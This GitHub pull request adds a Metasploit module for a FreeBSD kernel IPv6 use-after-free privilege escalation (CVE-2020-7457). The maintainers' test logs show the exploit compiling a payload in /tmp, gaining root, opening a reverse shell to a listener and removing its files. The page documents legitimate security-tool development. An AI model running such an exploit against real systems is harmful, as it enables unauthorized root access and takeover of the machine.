Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add FreeBSD ip6_setpktopt Use-After-Free Privilege Escalation module #13837

Merged
merged 5 commits into from
Jul 29, 2020
Merged

Add FreeBSD ip6_setpktopt Use-After-Free Privilege Escalation module #13837

merged 5 commits into from
Jul 29, 2020

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Jul 9, 2020
edited
Loading

This module exploits a race and use-after-free vulnerability in the
FreeBSD kernel IPv6 socket handling. A missing synchronization lock
in the IPV6_2292PKTOPTIONS option handling in setsockopt permits
racing ip6_setpktopt access to a freed ip6_pktopts struct.

This exploit overwrites the ip6po_pktinfo pointer of a ip6_pktopts
struct in freed memory to achieve arbitrary kernel read/write.

This module has been tested successfully on:

  • FreeBSD 9.0-RELEASE #0 (amd64)
  • FreeBSD 9.1-RELEASE #0 r243825 (amd64)
  • FreeBSD 9.2-RELEASE #0 r255898 (amd64)
  • FreeBSD 9.3-RELEASE #0 r268512 (amd64)
  • FreeBSD 12.0-RELEASE r341666 (amd64)
  • FreeBSD 12.1-RELEASE r354233 (amd64)

Resolves #13826

@bcoles bcoles added the module label Jul 9, 2020
@space-r7 space-r7 added the docs label Jul 13, 2020
@smcintyre-r7 smcintyre-r7 self-assigned this Jul 16, 2020
smcintyre-r7
smcintyre-r7 requested changes Jul 16, 2020
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Reviewed and left a few minor change requests, code looks great over all.

modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb Outdated Show resolved Hide resolved
modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb Outdated Show resolved Hide resolved
modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb Outdated Show resolved Hide resolved
@bcoles bcoles requested a review from smcintyre-r7 July 16, 2020 21:05
@smcintyre-r7
Copy link
Contributor

Well testing this from the current branch fails with the following error. If you could rebase this work onto master that would make testing easier.

msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[-] Exploit failed: NoMethodError undefined method `is_root?' for #<Msf::Modules::Exploit__Freebsd__Local__Ip6_setpktopt_uaf_priv_esc::MetasploitModule:0x000000000b1e24d0>
Did you mean?  is_a?
[*] Exploit completed, but no session was created.

I moved past that though and tested it from a merged state at which point it appears to have failed to compile. The target is a stock FreeBSD 12.0 system with cc installed.

msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] System architecture amd64 is supported
[+] FreeBSD 12.0-RELEASE r341666 GENERIC  appears vulnerable
[+] cc is installed
[+] The target appears to be vulnerable.
[*] Using target: FreeBSD 12.0-RELEASE r341666 - allproc offset: 0x1df3c38
[*] Writing '/tmp/.2Uc72Fr.c' (14162 bytes) ...
[*] Max line length is 131073
[*] Writing 14162 bytes in 1 chunks of 52038 bytes (octal-encoded), using printf
[*] Compiling /tmp/.2Uc72Fr.c ...
[-] error: unable to execute command: Executable "" doesn't exist!
[-] Exploit aborted due to failure: unknown: /tmp/.2Uc72Fr.c failed to compile
[*] Exploit completed, but no session was created.

@bcoles
Copy link
Contributor Author

bcoles commented Jul 22, 2020
edited
Loading

If you could rebase this work onto master that would make testing easier.

No thanks. It is literally a 3 line change. or just drop the .rb file in master. rebased

@bcoles bcoles force-pushed the ip6_setpktopt_uaf_priv_esc branch from 5273c5e to 95b99ce Compare July 26, 2020 08:05
@smcintyre-r7
Copy link
Contributor

Alright tested successfully with a session opened via auxiliary/scanner/ssh/ssh_login. Now this is interesting because when I tested it via exploit/multi/ssh/sshexec and the bsd/x64/shell_reverse_tcp payload it failed consistently to compile with the error I had mentioned error: unable to execute command: Executable "" doesn't exist!. Upon further testing it also works with a session opened from cmd/unix/reverse_openssl using sshexec, so I'm thinking it's an issue within the payload and not necessarily the module. Definitely something to be aware of though.

Testing output 
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i -1
[*] Starting interaction with 6...

To see how much disk space is left on your partitions, use

	df -h
		-- Dru <genesis@istar.ca>
id
uid=1001(smcintyre) gid=1001(smcintyre) groups=1001(smcintyre)
^Z
Background session 6? [y/N]  y
msf5 auxiliary(scanner/ssh/ssh_login) > previous 
[*] Using configured payload bsd/x64/shell_reverse_tcp
msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > show options 

Module options (exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on.


Payload options (bsd/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(freebsd/local/ip6_setpktopt_uaf_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Using target: FreeBSD 12.0-RELEASE r341666 - allproc offset: 0x1df3c38
[*] Writing '/tmp/.GQ8WGbv.c' (14162 bytes) ...
[*] Compiling /tmp/.GQ8WGbv.c ...
[*] Writing '/tmp/.MC4Wn' (218 bytes) ...
[*] Launching exploit (timeout: 30s) ...
[*] uid=0(root) gid=0(wheel) egid=1001(smcintyre) groups=1001(smcintyre)
[+] Success! Executing payload...
[*] Command shell session 7 opened (192.168.159.128:4444 -> 192.168.159.43:23808) at 2020-07-29 15:19:56 -0400
[+] Deleted /tmp/.GQ8WGbv.c
[+] Deleted /tmp/.GQ8WGbv
[+] Deleted /tmp/.MC4Wn

id
uid=0(root) gid=0(wheel) egid=1001(smcintyre) groups=1001(smcintyre)

@smcintyre-r7 smcintyre-r7 merged commit a886177 into rapid7:master Jul 29, 2020
@smcintyre-r7
Copy link
Contributor

smcintyre-r7 commented Jul 29, 2020
edited by pbarry-r7
Loading

Release Notes

New module exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc facilitates a local privilege escalation via a Use After Free vulnerability in the network stack of FreeBSD kernel versions 9.0 - 12.1 (CVE-2020-7457).

@bcoles bcoles deleted the ip6_setpktopt_uaf_priv_esc branch July 30, 2020 00:13
@pbarry-r7 pbarry-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 5, 2020
@bcoles bcoles mentioned this pull request Jul 12, 2021
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Add FreeBSD 12 'ip6_setpktopt' Kernel Local Privilege Escalation
4 participants
@bcoles @smcintyre-r7 @pbarry-r7 @space-r7